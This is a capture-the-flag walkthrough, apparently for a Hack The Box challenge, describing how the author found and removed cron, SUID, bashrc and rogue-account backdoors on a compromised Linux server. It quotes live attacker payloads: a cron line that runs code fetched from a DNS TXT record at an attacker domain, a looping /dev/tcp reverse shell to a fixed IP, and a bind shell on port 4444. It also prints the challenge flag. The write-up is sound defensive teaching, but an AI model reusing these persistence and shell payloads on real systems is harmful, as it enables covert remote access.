Challenge brief
Hackers made it onto one of our production servers. We’ve isolated it from the internet until we can clean the machine up. The IR team reported eight different backdoors on the server but didn’t say what they were and we can’t get in touch with them. We need to get this server back into prod ASAP – we’re losing money every second it’s down. Please find the eight backdoors (both remote access and privilege escalation) and remove them.
Walkthrough
This one was a lot of fun because I rarely play around with Linux. I assumed at the start there were eight separate elements for this but turns out there were only really four.
Cron
Cron is a great place to put things so first I looked for local conjobs within “/var/spool/cron/crontabs/” which had one for “user” and so time to dump it
#Check for cronjobs sudo ls -la /var/spool/cron/crontabs/user -rw------- 1 user crontab 250 May 14 2021 /var/spool/cron/crontabs/user #Dump the contents sudo cat /var/spool/cron/crontabs/user # DO NOT EDIT THIS FILE - edit the master and reinstall. # (- installed on Fri May 14 15:03:30 2021) # (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $) * * * * * /bin/sh -c "sh -c $(dig imf0rce.htb TXT +short @ns.imf0rce.htb)"
As shown above, this is a DNS beacon where when the TXT record gets queried, it will grab the TXT record and use it as an argument for the “sh -c” command. Whilst root doesn’t seem to have an entry there must be something, so I dumped all the configs within “/etc/cron*” which found two files of interest.
-rwxr-xr-x 1 root root 301 Apr 23 2021 access-up -rwxr-xr-x 1 root root 199 Jan 24 2021 pyssh
The first file “access-up” was interesting as it basically randomises a 6 char name and places it in either “/bin” or “/sbin” with 4755 permissions.
The second file “pyssh” simply calls the file “/lib/python3/dist-packages/ssh_import_id_update” which adds a ssh key to “/root/.ssh/authorized_keys”. The variables are just stored as base64 encoded strings.
To clean up the cronjobs I just ran the following
# As user to remove cronjob crontab -e # As root, remove the malcious files and entry from authorised keys rm /etc/cron.daily/access-up rm /etc/cron.daily/pyssh rm /lib/python3/dist-packages/ssh_import_id_update vim /root/.ssh/authorized_keys
SetUID permissions
Whilst I thought this was just cleaning up from the output of the file running within the cronjob, I did find a few more files.
find / -user root -perm -4000 -printf "%-25p %t\n" /home/user/.backdoor Fri May 14 15:03:30.0000000000 2021 /root/solveme Fri May 7 14:46:04.0000000000 2021 /usr/bin/newgrp Thu May 28 06:37:47.0000000000 2020 /usr/bin/gpasswd Thu May 28 06:37:47.0000000000 2020 /usr/bin/chfn Thu May 28 06:37:47.0000000000 2020 /usr/bin/su Tue Jul 21 07:49:28.0000000000 2020 /usr/bin/passwd Thu May 28 06:37:47.0000000000 2020 /usr/bin/mount Tue Jul 21 07:49:28.0000000000 2020 /usr/bin/chsh Thu May 28 06:37:47.0000000000 2020 /usr/bin/umount Tue Jul 21 07:49:28.0000000000 2020 /usr/bin/dlxcrw Thu Jun 18 15:44:55.0000000000 2020 /usr/bin/mgxttm Thu Jun 18 15:44:55.0000000000 2020 /usr/bin/sudo Tue Jan 19 14:21:02.0000000000 2021 /usr/lib/openssh/ssh-keysign Tue Mar 9 14:17:50.0000000000 2021 /usr/lib/dbus-1.0/dbus-daemon-launch-helper Thu Jun 11 18:22:13.0000000000 2020 /usr/sbin/afdluk Thu Jun 18 15:44:55.0000000000 2020 /usr/sbin/ppppd Fri May 14 15:03:24.0000000000 2021
Removing the common files I was left with
/home/user/.backdoor Fri May 14 15:03:30.0000000000 2021 /usr/bin/dlxcrw Thu Jun 18 15:44:55.0000000000 2020 /usr/bin/mgxttm Thu Jun 18 15:44:55.0000000000 2020 /usr/sbin/afdluk Thu Jun 18 15:44:55.0000000000 2020 /usr/sbin/ppppd Fri May 14 15:03:24.0000000000 2021
The first file seems to clearly be malicious and since the next three follow the pattern outlined above and were created at the exact same time I think it’s safe to assume these need to be removed as well. Now the last file was interesting as “pppd” is legitimate but I couldn’t find a reference to “ppppd” and when executed gave me a shell so I am going to assume it’s bad and remove it as well. If this wasn’t a fun activity, I would look deeper into the legitimacy before determining based on some limited details.
rm /home/user/.backdoor rm /usr/bin/dlxcrw rm /usr/bin/mgxttm rm /usr/sbin/afdluk rm /usr/sbin/ppppd
Rogue Processes
After following the cronjob bouncing ball, I figured there has to be something currently running so a simple listing revealed all
ps -auxf USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.0 2612 608 ? Ss 11:38 0:00 /bin/sh -c /usr/sbin/sshd -D -p 23 root 8 0.0 0.0 12180 7336 ? S 11:38 0:00 sshd: /usr/sbin/sshd -D -p 23 [listener] 0 of 10-100 startups root 9 0.0 0.1 13896 8868 ? Ss 11:40 0:00 \_ sshd: user [priv] user 23 0.0 0.0 14692 7108 ? S 11:40 0:00 \_ sshd: user@pts/0 user 24 0.0 0.0 5996 4016 pts/0 Ss 11:40 0:00 \_ -bash root 198 0.0 0.0 8308 4548 pts/0 S 12:21 0:00 \_ sudo -i root 199 0.0 0.0 5996 3924 pts/0 S 12:21 0:00 \_ -bash root 207 0.0 0.0 2592 1968 pts/0 S 12:21 0:00 \_ alertd -e /bin/bash -lnp 4444 root 282 0.0 0.0 7892 3356 pts/0 R+ 12:38 0:00 \_ ps -auxf root 19 0.0 0.0 3980 3016 ? S 11:40 0:00 /bin/bash /var/lib/private/connectivity-check root 280 0.0 0.0 3980 244 ? S 12:38 0:00 \_ /bin/bash /var/lib/private/connectivity-check
I was lucky to run this as root first because as a user I didn’t get the alertd command which means something in the root profile must be spawning this. Obviously, connectivity-check is bad which is confirmed with a dump of the file having mostly garbage (execution code) but at the bottom was the below code which was a nice confirmation.
while true; do nohup bash -i >& /dev/tcp/172.17.0.1/443 0>&1; sleep 10; done
To see when/how connectivity-check was called I simply grep’ed
grep -R "connectivity-check" /etc /etc/update-motd.d/30-connectivity-check:nohup /var/lib/private/connectivity-check &
Looking through “/root/.bashrc” confirmed alertd is spawned when popping a root terminal and since, for reasons, root owns “/home/user/.bashrc” this had to be replaced with a clean copy as well.
To clean this all up I ran the following
cp /etc/skel/.bashrc /root/.bashrc cp /etc/skel/.bashrc /home/user/.bashrc rm /etc/update-motd.d/30-connectivity-check rm /var/lib/private/connectivity-check rm /usr/bin/alertd kill 207 19 280
New Account
The next obvious place to check was for malicious account creation which was a nice quick win
cat /etc/passwd | grep -i "/bash" root:x:0:0:root:/root:/bin/bash gnats:x:41:0:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/bash user:x:1000:1000::/home/user:/bin/bash
Clearly “gnats” is either a malicious user or a bad admin with its level of access so I just nerfed this
usermod -s /usr/sbin/nologin gnats # Disabled logins usermod -g 1000 gnats # Changed it from roots group
Woop there it is
Issue 1 is fully remediated Issue 2 is fully remediated Issue 3 is fully remediated Issue 4 is fully remediated Issue 5 is fully remediated Issue 6 is fully remediated Issue 7 is fully remediated Issue 8 is fully remediated Congrats: HTB{7tr3@t_hUntIng_4TW}